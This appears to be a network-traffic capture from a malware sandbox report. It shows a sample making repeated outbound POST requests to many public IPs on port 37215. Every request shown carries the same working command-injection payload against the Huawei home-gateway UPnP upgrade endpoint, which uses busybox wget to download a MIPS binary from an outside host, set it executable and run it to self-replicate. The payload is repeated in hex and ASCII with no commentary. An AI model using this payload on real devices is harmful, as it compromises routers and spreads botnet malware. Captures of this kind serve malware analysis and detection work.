2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2393192.168.2.1539778157.73.211.22837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.397480011 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2394192.168.2.153907441.253.224.22737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.398020983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2395192.168.2.1542326197.195.230.3537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.398072004 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2396192.168.2.1541696197.186.27.18037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.398140907 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2397192.168.2.153356041.189.99.12837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.398156881 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2398192.168.2.153684641.197.243.4437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.398303986 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2399192.168.2.1550726152.244.247.20937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.402580023 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2400192.168.2.1551092157.58.178.18337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.402645111 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2401192.168.2.155826218.34.34.23937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.403366089 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2402192.168.2.1549060157.201.73.10637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.407692909 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2403192.168.2.1556748197.254.168.25137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.407747984 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
